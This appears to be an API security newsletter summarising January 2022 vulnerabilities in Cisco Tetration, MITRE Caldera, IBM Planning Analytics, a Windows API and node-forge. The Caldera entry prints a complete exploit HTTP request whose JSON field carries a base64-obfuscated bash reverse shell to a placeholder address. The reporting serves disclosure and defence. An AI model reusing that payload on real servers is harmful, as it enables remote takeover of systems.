ApiSec: The week of Jan'10th, 2022. CISCO, MSFT, IBM, MITRE and NodeJS. The week of command injections.
CISCO Tetration API root-level command injection
A vulnerability in the web-based management interface and in the API subsystem of Cisco Tetration could allow an authenticated, remote attacker to inject arbitrary commands to be executed with root-level privileges on the underlying operating system.
This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by submitting a crafted HTTP message to the affected system. A successful exploit could allow the attacker to execute commands with root-level privileges. To exploit this vulnerability, an attacker would need valid administrator-level credentials.
Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
Source: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-tetr-cmd-injc-skrwGO
MITRE Caldera Command Injection Via Configurations. CVE-2021-42559
An issue was discovered in CALDERA 2.8.1. It contains multiple startup “requirements” that execute commands when starting the server. Because these commands can be changed via the REST API, an authenticated user can insert arbitrary commands that will execute when the server is restarted.
An exploit is really simple, just a OS command inside the JSON API request body, value->go->command JSON parameter:
POST /api/rest HTTP/1.
Host: 192.168.243.180:8888
Content-Type: application/json
Content-Length: 307
Cookie: API_SESSION="gAAAAABfkzOeJGqWz0pgDyaZ16BdFmuQzOenIthJ6XI9pgdt38mOPFYVv1ghN3NOjo5ZAEv934xzRKXehT35Msve_JHBMaPMyFY2JAFtYtCoU6jGLC7Bz8XBAoH9SArDdi3oTSVkAMl7rRu17YM-O6QBqO81XZya_g=="
{"index":"configuration","prop":"requirements","value":{"go": {"command": "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}", "type": "installed_program", "version": 1.11}, "python": {"attr": "version", "module": "sys", "type": "python_module", "version": "3.6.1"}}}
领英推荐
IBM Planning Analytics 2.0 and IBM Planning Analytics Workspace 2.0 DQM. CVE-2021-38892
IBM APIs allows submitting of all control requests in unauthenticated sessions. This allows a remote threat actor who can access (without previous authentication) a valid PA endpoint to read and write files to the IBM Planning Analytics system. Depending on file system permissions up to path traversal and possibly remote code execution. IBM X-Force ID: 209511.
Windows Security Center API Remote Code Execution Vulnerability. CVE-2022-21874
We don't know much, but this is nuts!
CVE-2022-21874?is a publicly disclosed RCE in the Windows Security Center API that received a CVSSv3 score of 7.8. It was discovered by?Jinquan?with DBAPPSecurity Lieying Lab. This vulnerability requires user interaction to exploit and the attack vector is local.
Node-forge Prototype Pollution
The?forge.debug?API had a potential prototype pollution issue if called with untrusted input. The API was only used for internal debug purposes in a safe way and never documented or advertised. It is suspected that uses of this API, if any exist, would likely not have used untrusted inputs in a vulnerable way.
Very excited now to be shifting gears to enjoy other pursuits. ;-)
3 年Thanks Ivan for this latest edition of the API Security newsletter. Great reporting, as always.